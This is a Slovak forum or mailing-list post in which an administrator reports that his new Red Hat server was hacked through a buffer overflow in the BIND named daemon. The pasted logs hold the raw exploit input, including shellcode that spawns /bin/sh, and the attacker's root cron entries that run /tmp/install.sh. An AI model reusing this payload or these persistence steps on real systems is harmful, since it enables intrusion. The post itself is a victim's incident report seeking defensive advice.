Hack

[Vladimir Rengevic]

Dobry den vospolok!

Mam mensi problem - priamo pod rukami mi hackli server (nastastie cerstvo
experimentalne nainstalovany, takze len zabijem cas reinstalaciou, inac
nic).
Dotycny asi neratal, ze kazdych 30 sekund kukam do logu ;-)

Chcel by som sa len pre buducnost opytat, ci je uz proti tomu obrana.
Je tam named 8.2.2-P5 (no, po tejto skusenosti uz bude to najnovsie co
najdem).

Stalo sa to takto - klasicky stack owerflow (ci buffer owerflow?)
proste preplnenie vstupneho riadka- X- pokusov:

Jan 14 09:51:07 ns SERVER[1065]: Dispatch_input: bad request line
'BBđBBżBBżBBżóBBż
XXXXXXXXXXXXXXXXXX000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000
00
0000000000000000000000000000000000000000000000000004800001347270610000000000
000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000135022648000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000003221224720




1Ű1É1Ŕ°FÍ??ĺ1Ҳf?Đ1É?ËC?]řC?]ôK?MüŤM
ôÍ?1É?EôCf?]fÇEî^O'MđŤEEřĆEü^P?ĐŤMôÍ??ĐCCÍ??

Jan 14 09:51:07 ns SERVER[1066]: Dispatch_input: bad request line
'BB^HüBż^IüBż'



a potom (znova X-krat, az sa mu to zadarilo):

Jan 14 09:51:12 ns SERVER[1100]: Dispatch_input: bad request
line 'BBđűBżűBżűBżóűBżXXXXXXXXXXXXXXXXXX000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000
0000048security.00000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000134727061




1Ű1É1Ŕ°FÍ??ĺ1Ҳf?Đ1É?ËC?]řC?]ôK?MüŤ
MôÍ?1É?EôCf?]fÇEî^O'MđŤEEřĆEü^P?ĐŤMôÍ??ĐCCÍ??ĐCÍ??Ă1ɲ??ĐÍ??
ĐAÍ?ë^X^?u^H1ŔˆF^G?E^L°^K?óŤM^HŤU^LÍ?čăBBB/bin/sh'

(riadky su pozalamovane)

no a nakoniec si doinstaloval :

Jan 14 09:59:58 ns crontab[1710]: (root) LIST (root)

Jan 14 09:59:58 ns crontab[1711]: (root) REPLACE (root)

Jan 14 10:00:00 ns CROND[1715]: (root) CMD ( /sbin/rmmod -as)

Jan 14 10:00:00 ns CROND[1716]: (root) CMD (/tmp/install.sh >/dev/null
2>/dev/null)

Jan 14 10:00:00 ns crontab[1718]: (root) LIST (root)

Jan 14 10:00:00 ns crontab[1720]: (root) REPLACE (root)

Jan 14 10:01:00 ns crond[778]: (root) RELOAD (cron/root)

Jan 14 10:01:00 ns CROND[1725]: (root) CMD (run-parts /etc/cron.hourly)


No, proste do crontabu pridal riadky:
# sysstat

0 * * * 0,6 /usr/lib/sa/sa1 600 6 &

5 19 * * * /usr/lib/sa/sa2 -A &

Viac som nezistil, ale aj tak to preinstalujem :-(

Len by ma zaujimal nazor na bezpecnost od skusenejsich. Mne sa to stalo prvy
krat, pevnu linku mam

tak 2 tyzdne, z toho tam bol hlavny firemny server asi 5 dni (stastie, ze si
ho zatial nik nevsimol)

a tento pokusny tam bol asi 3 hodiny. Inac je tam RedHat 7.0 tak ako bol
nainstalovany

z CD. Updaty som nestihol :-(.



Vlado